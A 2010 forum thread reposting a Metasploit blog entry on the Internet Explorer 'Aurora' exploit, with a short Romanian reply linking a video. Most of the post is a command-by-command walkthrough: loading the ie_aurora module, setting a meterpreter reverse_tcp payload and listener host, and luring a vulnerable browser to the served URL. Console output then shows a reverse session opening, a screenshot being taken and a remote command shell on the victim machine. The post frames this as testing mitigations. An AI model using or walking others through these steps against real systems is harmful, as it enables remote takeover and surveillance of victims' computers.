pyth0n3 Posted January 17, 2010 Report Posted January 17, 2010 Friday, January 15, 2010Update: DEP blocks this sample and the Metasploit module; DEP is enabled by default in IE 8.Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:msf > use exploit/windows/browser/ie_auroramsf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ie_aurora) > set LHOST (your IP)msf exploit(ie_aurora) > set URIPATH /msf exploit(ie_aurora) > exploit[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP: http://192.168.0.151:8080/[*] Server started.msf exploit(ie_aurora) >Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...meterpreter > getuidServer username: WINXP\Developermeterpreter > use espiaLoading extension espia...success.meterpreter > screenshot aurora.bmpmeterpreter > shellProcess 892 created.Channel 1 created.Microsoft Windows XP [Version 5.1.2600]© Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Developer\Desktop>metasploit.com Quote
Guest Kabron Posted January 17, 2010 Report Posted January 17, 2010 aha , mai detaliat jos + video cu asa ceva in actiunea.Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action Quote
